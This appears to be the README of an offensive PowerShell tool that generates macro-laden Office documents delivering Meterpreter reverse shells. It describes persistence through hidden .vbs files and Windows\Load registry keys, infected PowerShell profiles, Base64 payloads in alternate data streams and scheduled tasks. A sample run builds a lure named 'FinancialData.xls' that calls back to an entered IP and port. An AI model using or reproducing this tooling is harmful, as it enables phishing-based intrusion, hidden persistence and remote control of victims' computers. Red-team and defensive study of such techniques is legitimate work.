When naming the document, do not include a file extension.
These attacks use Invoke-Shellcode, which was created by Matt Graeber. Follow him on Twitter --> @mattifestation
- Meterpreter Shell with Logon Persistence:
This attack delivers a meterpreter shell and then persists in the registry by creating a hidden .vbs file in C:\Users\Public and then creates a registry key in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load that will execute the .vbs file on login. - Meterpreter Shell with PowerShell Profile Persistence:
This attack requires the target user to have Administrator privileges but is quite creative. It will deliver you a shell and then drop a malicious .vbs file in C:\Users\Default\AppData\Roaming\Microsoft\Windows\Cookies\cookie.vbs. Once dropped, it creates an infected PowerShell Profile file in C:\Windows\SysNative\WindowsPowerShell\v1.0\ and then creates a registry key in HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load that will execute Powershell.exe on startup. Since the PowerShell profile loads automatically when Powershell.exe is invoked, your code is executed automatically. - Meterpreter Shell with Alternate Data Stream Persistence:
This attack will give you a shell and then persists my creating 2 alternate data streams attached to the AppData folder. It then creates a registry key that parses the Alternate Data Streams and runs the Base64 encoded payload. - Meterpreter Shell with Scheduled Task Persistence:
This attack will give you a shell and then persist by creating a scheduled task with the action set to the set payload.
```
PS> ./Generate-Macro.ps1
Enter IP Address: 10.0.0.10
Enter Port Number: 1111
Enter the name of the document (Do not include a file extension): FinancialData
- Meterpreter Shell with Logon Persistence
- Meterpreter Shell with Powershell Profile Persistence (Requires user to be local admin)
- Meterpreter Shell with Microsoft Outlook Email Persistence
- Meterpreter Reverse HTTPS
- Meterpreter Reverse HTTP
--------Select Attack---------
Select Attack Number & Press Enter: 1
--------Select Payload---------
Select Payload Number & Press Enter: 1 Saved to file C:\Users\Malware\Desktop\FinancialData.xls